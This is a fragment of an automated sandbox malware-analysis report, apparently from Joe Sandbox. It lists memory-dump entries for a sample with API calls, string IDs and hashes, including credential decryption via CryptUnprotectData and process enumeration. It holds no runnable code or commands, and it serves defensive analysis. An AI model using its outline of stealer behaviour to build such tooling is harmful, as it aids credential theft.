                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Similarity
                                • API ID:
                                • String ID: .>$,}$6S{$g"<$qQs$v?$zB]?
                                • API String ID: 0-2263300472
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Similarity
                                • API ID:
                                • String ID: %~{=$8O[=$P&W$jxe$q_m$xpo
                                • API String ID: 0-570918950
                                • Opcode ID: c64625379f90b6e7ec6ae7474b483d55f65971392ec709d5f12d861da57184f2
                                • Instruction ID: c778c21ba43ef4aba06695b4dfdd0076eaf51dcb08d1b2f8d7e5c503e4ab1d25
                                • Opcode Fuzzy Hash: c64625379f90b6e7ec6ae7474b483d55f65971392ec709d5f12d861da57184f2
                                • Instruction Fuzzy Hash: F1B2F6F360C2009FE304AE2DEC8567ABBE9EF94320F1A893DE6C4C7744E67558458697
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 006E2C42
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006E2C49
                                • GetTimeZoneInformation.KERNEL32(?), ref: 006E2C58
                                • wsprintfA.USER32 ref: 006E2C83
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID: wwww
                                • API String ID: 3317088062-671953474
                                • Opcode ID: 6e4fad7f9a1e06aa3b3f17430880216a08016159091fba000bc0a755f6f1449f
                                • Instruction ID: ffbb782fecd567bfd48d3b5b5c3e938753d7e9c5348fba97b996dd978301e28a
                                • Opcode Fuzzy Hash: 6e4fad7f9a1e06aa3b3f17430880216a08016159091fba000bc0a755f6f1449f
                                • Instruction Fuzzy Hash: 3701F771A00604ABC7188B68DC09F69B76EEB84721F104329F916DB3C0DB74190086D1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Similarity
                                • API ID:
                                • String ID: "&M$Jo$P7%$&w9$fw
                                • API String ID: 0-4205341186
                                • Opcode ID: 9abe25e3ee480f930ce3ef9b2530d45934762ac32aad26c16d7215916158203c
                                • Instruction ID: 77adcdf18efe0b5c4d3a7a6f53b9c4c36f28f9d1026558ec23dbf3fbb5f981c2
                                • Opcode Fuzzy Hash: 9abe25e3ee480f930ce3ef9b2530d45934762ac32aad26c16d7215916158203c
                                • Instruction Fuzzy Hash: 54B23BF360C2049FE304AE2DEC8567ABBEAEFD4720F1A853DE6C4C7744E97558018696
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Similarity
                                • API ID:
                                • String ID: ?pOo$ocW$yf~n$27$rw]
                                • API String ID: 0-3059391896
                                • Opcode ID: a1f223252b47f2756fde7bae9883c078557ceed98796ff60474bb5dc2bb75ef6
                                • Instruction ID: 2ea863b722b6e12378605f6783a4ad5cb29b802b6864d5d0b143dca0a9ce5526
                                • Opcode Fuzzy Hash: a1f223252b47f2756fde7bae9883c078557ceed98796ff60474bb5dc2bb75ef6
                                • Instruction Fuzzy Hash: 0AB207F3A082049FE3046E2DEC8567AFBEAEF94720F1A453DEAC4C3744E67558058697
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 006C775E
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C7765
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 006C778D
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 006C77AD
                                • LocalFree.KERNEL32(?), ref: 006C77B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: d8e40af82fa49334ba03e654f1de8c40df90ac28e7d159223a892dbab78b6a13
                                • Instruction ID: 4d37ef305383be49f59d58e9593be52d817bb5f02be0ab909076bcf563372fee
                                • Opcode Fuzzy Hash: d8e40af82fa49334ba03e654f1de8c40df90ac28e7d159223a892dbab78b6a13
                                • Instruction Fuzzy Hash: 2A011275B40308BFEB10DBA49C4AFBA7B79FB44B15F104155FA09EB2C0DAB0A900CB94
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Similarity
                                • API ID:
                                • String ID: jU$N(?{$Q$y$TKo
                                • API String ID: 0-3309813427
                                • Opcode ID: 2c79d99f4ffa4324ff945e6818cfcc26c5919054fed3a076bb5304ea321902db
                                • Instruction ID: 3549faa2e81e49edfecc1a1ef72a94d2e6726e82f6e12170dc7c9afe5aa015ca
                                • Opcode Fuzzy Hash: 2c79d99f4ffa4324ff945e6818cfcc26c5919054fed3a076bb5304ea321902db
                                • Instruction Fuzzy Hash: B5B249F3A0C2149FE3046E2DEC85A7ABBE9EF94720F1A453DEAC4D3744E975580086D6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Similarity
                                • API ID:
                                • String ID: ,'~f$a~_$hwe|$qi+
                                • API String ID: 0-1193033150
                                • Opcode ID: 4f183c13b3d80b2fb163c1af81d3693e307bcd47714b71a7d2a829b7a6329c33
                                • Instruction ID: 2775d27b1782b9e822241c969366250e2ed6aa05231b3f3549eebcc0d48aa57f
                                • Opcode Fuzzy Hash: 4f183c13b3d80b2fb163c1af81d3693e307bcd47714b71a7d2a829b7a6329c33
                                • Instruction Fuzzy Hash: ABB23AF3A0C2049FE304AE2DEC8567AB7E9EFD4720F1A453DEAC4C7744EA3558058696
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Similarity
                                • API ID:
                                • String ID: "=$$*]$Rcy$v>9o
                                • API String ID: 0-340277136
                                • Opcode ID: a6b33cc8f296d7574b4d1ed3edc6e1af12872174a2c3bac17d65df2f72c68ceb
                                • Instruction ID: 3080d686f45027ed990916eeb59e3f1c68a0db050657f57c82e5414c27f14d58
                                • Opcode Fuzzy Hash: a6b33cc8f296d7574b4d1ed3edc6e1af12872174a2c3bac17d65df2f72c68ceb
                                • Instruction Fuzzy Hash: 54B2F6F3A08200AFE314AE29DC8577ABBE9EF94720F16493DEAC5C7744E63558408797
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Similarity
                                • API ID:
                                • String ID: 7g{_$V3y$i\9$HP
                                • API String ID: 0-284449329
                                • Opcode ID: 0f39269051592515183b3d2214780bd3ec7277a95756a42ce2a5a46be4f155b8
                                • Instruction ID: 315c2f7929837ce38cc57ff167e478aec8bd7a23515e71bb60570b3d8ca6f43d
                                • Opcode Fuzzy Hash: 0f39269051592515183b3d2214780bd3ec7277a95756a42ce2a5a46be4f155b8
                                • Instruction Fuzzy Hash: A8A217F3A082109FE304AE2DDC8567AFBE9EF94720F16893DE6C4C7744EA3558458693
                                APIs
                                  • Part of subcall function 006E71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006E71FE
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006E3A96
                                • Process32First.KERNEL32(00000000,00000128), ref: 006E3AA9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006E3ABF
                                  • Part of subcall function 006E7310: lstrlen.KERNEL32(------,006C5BEB), ref: 006E731B
                                  • Part of subcall function 006E7310: lstrcpy.KERNEL32(00000000), ref: 006E733F
                                  • Part of subcall function 006E7310: lstrcat.KERNEL32(?,------), ref: 006E7349
                                  • Part of subcall function 006E7280: lstrcpy.KERNEL32(00000000), ref: 006E72AE
                                • CloseHandle.KERNEL32(00000000), ref: 006E3BF7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: 0bb543a4ea587bb340cf25b2c17e16027232b4aaaea984791a882a7d4ee5433c
                                • Instruction ID: 47083e41c95c9a899eafd6cb40df528fce3bc7d361268b6ec82e2b7ce78575f3
                                • Opcode Fuzzy Hash: 0bb543a4ea587bb340cf25b2c17e16027232b4aaaea984791a882a7d4ee5433c
                                • Instruction Fuzzy Hash: 4781E530902354CFC714CF2AD948BA5B7F2FB54329F29C1A9D4099B3A2D7769D86CB84
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 006CEA76
                                • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 006CEA7E
                                • lstrcat.KERNEL32(006ECFEC,006ECFEC), ref: 006CEB27
                                • lstrcat.KERNEL32(006ECFEC,006ECFEC), ref: 006CEB49
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: bcfb3d286becced1e7b5ad3061436fb746fb1fdbd28302d2f0e55b39db216d7d
                                • Instruction ID: b5d373e609a0da9337071f91bd7ea79547cfd879528d6ccb16d8af19ea9c96fd
                                • Opcode Fuzzy Hash: bcfb3d286becced1e7b5ad3061436fb746fb1fdbd28302d2f0e55b39db216d7d
                                • Instruction Fuzzy Hash: 6731D375B01219ABDB109BA9EC45FFEB77EEF84715F0041A9F909E3240DBB15A04CBA1
                                APIs
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 006E40CD
                                • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 006E40DC
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006E40E3
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 006E4113
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptHeapString$AllocateProcess
                                • String ID:
                                • API String ID: 3825993179-0
                                • Opcode ID: 72c7d6ae1f40bd6941a3a754f4cfd2606eaf881e31e6dc3439b51dd277d47461
                                • Instruction ID: b5a43b5e349029e198da86e4722f978467d47a6be643ac9c2abb0e2492364dc8
                                • Opcode Fuzzy Hash: 72c7d6ae1f40bd6941a3a754f4cfd2606eaf881e31e6dc3439b51dd277d47461
                                • Instruction Fuzzy Hash: A9011A70601205ABDB109FB5EC89FAABBAEEF85311F108169FE4987340DE719940CBA4
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,006EA3D0,000000FF), ref: 006E2B8F
                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 006E2B96
                                • GetLocalTime.KERNEL32(?,?,00000000,006EA3D0,000000FF), ref: 006E2BA2
                                • wsprintfA.USER32 ref: 006E2BCE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: e5c54037bf95db458f172806dd3e3f6534bea714f72fc23ad7af0c64b8663147
                                • Instruction ID: ee7b3be6a8ba93fecc64e24483211ca130bba31acf13857a8458ca0cbc914f79
                                • Opcode Fuzzy Hash: e5c54037bf95db458f172806dd3e3f6534bea714f72fc23ad7af0c64b8663147
                                • Instruction Fuzzy Hash: 960140B2904528EBCB149BDADD45FBEB7BCFB4CB11F00011AF645A2280E7785440C7B1
                                APIs
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 006C9B3B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 006C9B4A
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 006C9B61
                                • LocalFree.KERNEL32 ref: 006C9B70
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: 7ecf12b0d36600da7d5b3c7f141c1e51560550ea2c4541e4593688fc385e6297
                                • Instruction ID: 08218f9464764e3135001480db28c95f7a2a4678496f3d19a27c242b29187cc8
                                • Opcode Fuzzy Hash: 7ecf12b0d36600da7d5b3c7f141c1e51560550ea2c4541e4593688fc385e6297
                                • Instruction Fuzzy Hash: 84F01D703407127BE7305F74AC49FA77BA8EF44B50F210114FA49EA2D0EBB49C40CAA4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 6|~o$~0;$&}o
                                • API String ID: 0-295759132
                                • Opcode ID: 207ee3f077f33cd4b8205b9f92b486eb3e0ac4891bfb290f85732c6c266b506f
                                • Instruction ID: ad8b9ae899918b745fe6e7cc0e5eccece3b9f5f0e0977f2473a69977ff01b49c
                                • Opcode Fuzzy Hash: 207ee3f077f33cd4b8205b9f92b486eb3e0ac4891bfb290f85732c6c266b506f
                                • Instruction Fuzzy Hash: 41A216F36086049FE304AE2DEC8567ABBEAEFD4720F1A853DE6C487744E63558058793
                                APIs
                                • CoCreateInstance.COMBASE(006EB110,00000000,00000001,006EB100,?), ref: 006DCB06
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 006DCB46
                                • lstrcpyn.KERNEL32(?,?,00000104), ref: 006DCBC9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                • String ID:
                                • API String ID: 1940255200-0
                                • Opcode ID: fe41bdbb847e6701e05975efde7ae662da90743a20b565e6c2b830051b528c6e
                                • Instruction ID: e4be8d5332b7bec722c2e1071f6e13211cce256b59060c601b5c4ff8fb1f8e6f
                                • Opcode Fuzzy Hash: fe41bdbb847e6701e05975efde7ae662da90743a20b565e6c2b830051b528c6e
                                • Instruction Fuzzy Hash: 1C314671A40619BFD710DB94CC92FAA77B9EB88B10F104195FA14EB2D0D7B0ED45CB90
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 006C9B9F
                                • LocalAlloc.KERNEL32(00000040,?), ref: 006C9BB3
                                • LocalFree.KERNEL32(?), ref: 006C9BD7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: da9ff68d92048531ab5c6850659c0bdf8ab7aa8f6061ae5c62d217d25c105888
                                • Instruction ID: 18e26896a55cbfb5556ab5d3f8064477fe73d6c1e1fdea2156297ac2ad38e0fe
                                • Opcode Fuzzy Hash: da9ff68d92048531ab5c6850659c0bdf8ab7aa8f6061ae5c62d217d25c105888
                                • Instruction Fuzzy Hash: 2901FB75A41209ABE7109BA4DC49FBBB779EB84B00F104558EA04AB384DBB49E00CBE5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: }~Y7
                                • API String ID: 0-901423381
                                • Opcode ID: 3b0367b08703e9a7ddb821a3c007f073d79aac24580350d108492daa16268e67
                                • Instruction ID: 45d3bef5d55ce75eea4ceb471add7a188dca6e0a092a48215ef5660556fba19e
                                • Opcode Fuzzy Hash: 3b0367b08703e9a7ddb821a3c007f073d79aac24580350d108492daa16268e67
                                • Instruction Fuzzy Hash: 715227F3A082109FE308AE2DEC95A7BBBE9EFD4360F1A453DE5C5C7744E93558018692
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: :Bnn
                                • API String ID: 0-2629342209
                                • Opcode ID: 9e6c95dd639ed3679260cd6574306cfbf00a148e7fafa46e3d5dc740318e59b0
                                • Instruction ID: 9ec28091e223e42460296340f1115761c55e1934b8544c57e75df86a69cd3787
                                • Opcode Fuzzy Hash: 9e6c95dd639ed3679260cd6574306cfbf00a148e7fafa46e3d5dc740318e59b0
                                • Instruction Fuzzy Hash: 606158F3E082045BE348693DDC2577AB6D6EB95320F1F453DDA86D7B80EC3949458286
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 309761e0c50f79cd835c612c9eb3749fc2ffe09b8fb9eaae8b1b3559382ba41d
                                • Instruction ID: e3586b0b113d146e4593d9c369b831a7d7861285050e93a26c9450def4dcd039
                                • Opcode Fuzzy Hash: 309761e0c50f79cd835c612c9eb3749fc2ffe09b8fb9eaae8b1b3559382ba41d
                                • Instruction Fuzzy Hash: 578102B3A083008BE3046E3DED9573AB7D5EB94320F1A893DEBC5C7784E97D49458686
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 42b06f1451ecb70007eebaa9ffc73fc560bd339791a27977fe6e1e8d30c07889
                                • Instruction ID: f91ac6e6ac3c720020540ab035affcfbd9c51d1700695e2bd80091672006ed47
                                • Opcode Fuzzy Hash: 42b06f1451ecb70007eebaa9ffc73fc560bd339791a27977fe6e1e8d30c07889
                                • Instruction Fuzzy Hash: 405138B3F082205BF354993DED487667ADAD7C4320F3B823DE948D7784E87A5D0646A1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4c7610bbf22321163ad14881ea702903f00cc44be5f6fbd51d20bbf6b2d89e51
                                • Instruction ID: 2d82937fc89b66e6d5b5a5d20ed6b6b1e74d058930fb209819b2f53081286899
                                • Opcode Fuzzy Hash: 4c7610bbf22321163ad14881ea702903f00cc44be5f6fbd51d20bbf6b2d89e51
                                • Instruction Fuzzy Hash: 584105F361C200DFE3086E18D88157AB7D5EF98320F2589AEE1FBC6680D635D8419753
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 785781458f8d28df55a723180428c604c2c60ab9d3510bc68693a52667853a1c
                                • Instruction ID: 3b694373b5b13401a740e006feb39d268460e769896b010a7f0b0a38c76c6844
